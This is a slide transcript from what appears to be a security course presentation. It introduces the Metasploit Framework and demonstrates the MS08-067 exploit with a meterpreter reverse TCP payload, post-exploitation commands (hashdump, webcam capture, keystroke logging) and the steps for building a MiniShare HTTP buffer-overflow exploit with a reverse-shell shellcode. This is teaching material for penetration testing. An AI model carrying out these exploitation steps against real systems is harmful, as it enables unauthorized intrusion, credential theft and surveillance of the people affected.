/
Anthony Gabrielson Anthony Gabrielson

Anthony Gabrielson - PowerPoint Presentation

olivia-moreira
olivia-moreira . @olivia-moreira
Follow
382 views
Uploaded On 2016-10-17

Anthony Gabrielson - PPT Presentation

Adam Helbling Agenda Part 2 From ploit to ploit Overview Assumptions Environment Setup Ollydbg Introduction Vulnerability Explanation Crafting the Exploit Metasploit ID: 477220

metasploit exploit ploit windows exploit metasploit windows ploit framework address service vulnerability http module buffer exploits esp meterpreter shellcode eip dll sp2

Share:

Link:

Embed:

Download Presentation from below link

Download Presentation The PPT/PDF document "Anthony Gabrielson" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.


Presentation Transcript

Slide1

Anthony GabrielsonAdam HelblingSlide2

Agenda

Part 2:

From ‘

ploit’ to ‘ploit’OverviewAssumptionsEnvironment SetupOllydbg IntroductionVulnerability ExplanationCrafting the ExploitMetasploit EnablersAdding Shellcode

Part 1:

The

Metasploit

Framework

Basics

Running

Metasploit

The Exploit

Demo

More on ExploitsSlide3

The Metasploit Framework:

Basics

Created in 2003 by HD MooreVitalsBSD License700K lines of RubyCurrently produced by Rapid 7De facto standard in vulnerability development frameworkCommercial AlternativesRapid 7 has many commercial implementationsImmunities CANVASCore ImpactSlide4

The Metasploit Framework:

Basics (cont’d)

Metasploit is a well known anti-forensic and evasion toolModular for ease of development and portabilitymsfupdateGet the latest & greatest exploitsmsfconsoleThe console – also works as a command shell

Exploit Automation

Db_autopwn

Very noisy

Requires a databaseSlide5

The Metasploit Framework:

Running MetasploitSlide6

The Metasploit Framework:

The Exploit

ms08_067_netapi (RANK: Great)This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.This attack can be prevented

with the MS08-

067 patch.Slide7

The Metasploit Framework:

DemoSlide8

The Metasploit Framework:

Demo Walkthrough

Msfconsoleuse exploit/windows/smb/ms08_067_netapiset PAYLOAD windows/meterpreter/reverse_tcpset RHOST [remote host] 192.168.11.51set LHOST [local host] 192.168.11.53show optionsModule options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- -----------

RHOST 192.168.11.51

yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/

meterpreter/reverse_tcp

):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique:

seh

, thread, none, process

LHOST 192.168.11.53

yes The listen address

LPORT 4444 yes The listen port

ExploitSlide9

The Metasploit Framework:

More about the Exploit

msf exploit(ms08_067_netapi) > show targetsExploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX)…

61 Windows 2003 SP2 Japanese (NO NX)Slide10

The Metasploit Framework:

Meterpreter

CommandsCommandsmeterpreter > sysinfoSystem Language : en_USOS : Windows XP (Build 2600, Service Pack 2).Computer : AGABRIEL-B90B23Architecture : x86Meterpreter : x86/win32

meterpreter

>

getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter

> shell

Process 396 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

More

Hashdump

Upload

Webcam_snap

keybscan_{start

, stop, dump}

psSlide11

Q: What can you do with a known vulnerability?Craft an exploit, execute from a command-line

What else?

Metasploit is not perfect, but it has its place.

RepositoryFrameworkTools to help build exploitsEase of useGeneric shellcode vs. robust shellcode Challenges:Crafting the exploitReuse of an exploitFrom

ploit

to

ploit

: Overview

…or how to add a generic exploit to your metasploit arsenalSlide12

From ploit to ploit

: Assumptions

Already spent resources (time, money, etc.) to discover a vulnerability via one (or all) of the following:

FuzzingStatic disassemblyReview of source codeKnown vulnerabilityCVE we found on (http://cve.mitre.org/)Security Advisory (http://secunia.com/advisories)Known ExploitExploit DB (http://www.exploit-db.com/exploits

)Slide13

From ploit to ploit

: Environment Setup

Vulnerability:

MiniShare HTTP “GET” Request Buffer Overflow VulnerabilityExploit: MiniShare Remote Buffer Overflow Exploit (c source)Windows XP SP2 (or really any XP version)MiniShare 1.4.1Ollydbg 1.10Backtrack 4Metasplioit

Python

NetcatSlide14

From ploit to ploit

:

Ollydbg

IntroductionMain Pane:CPU Instructions (Microsoft Assembler format)Memory Pane:Current section of memory where the code is executingRegisters Pane:EIP: Address of next instruction to be executedESP: Stack pointerStack Pane:Shows the entries on stackSlide15

From ploit to ploit

: Vulnerability Explanation

HTTP GET with a large (>1787 bytes) request

GET [a string of >1787 bytes] HTTP/1.1\r\n\r\nEIP = 0x41414141Access violation when reading [41414141]EIP points to the address containing the next instruction, but 0x41414141 throws an access violation.ESP = the address of the buffer that was overflowed.Note the “AAAAAAAAAAAAAAAAAA……AAAA”Slide16

From ploit to ploit

: Crafting the Exploit

This approach is different then the lab exercise assigned.

We are not overwriting stack’s return address hereInstead let’s find an instruction in the code to transfer our execution:\xFF\xE4 = JMP ESP – Jump to the address stored in ESP.Overwrite EIP with the address of a JMP ESP instruction.More robust to some degree because we will pick an address that is predictable and will work across more systems.In Win XP SP2 there is no randomization of base location for where DLLs are loaded, therefore if we chose a DLL it will work on each system that loads this DLL.

However, the best choice would be a DLL provided with

MiniShare

, however, there are none, so we revert to using a Windows DLL.Slide17

From ploit to ploit

:

Metasploit

Enablers/pentest/exploits/framework3/tools/pattern_create.rbCreates a unique pattern of a user specified length.Useful for understanding the offsets within the buffer where we overwrite./pentest/exploits/framework3/tools/pattern_offset.rbReturns the location of where EIP is overwritten and where ESP points to.Finds offsets using from the pattern generated by

pattern_create.rb

EIP overwritten at 1787 bytes into our buffer

ESP points to location 1791 bytes into our bufferSlide18

From ploit to ploit

: Adding

Shellcode

Using msfpayload which comes with Metasploit we will create a useful piece of shellcode which creates a reverse shell on a port.What is a reverse shell?Note: Does this give us away?!C style vs. raw output (‘R’ vs. ‘C’)Does anyone see a problem with some of this shellcode?Msfencode

can help us…

Let’s add some NOP’s to help improve stability.

Now all that would need to be done is to add this to

Metasploit

as a ruby script. (Note: It’s already in there)Slide19

References and Conclusions

http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

This presentation just begins to scratch the surface

http://www.offensive-security.com/metasploit-unleashed/Metasploitable Questions?Slide20

The Metasploit Framework:

The Exploit (2)

psexeclight-weight telnet-replacement that lets you execute processes on other systemsThis module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.This one has more, list ‘emSlide21

The Exploit (3)

ms05_039_pnp

Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege

This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot.Affected Systems: Win2k SP4, Win XP SP2, etc…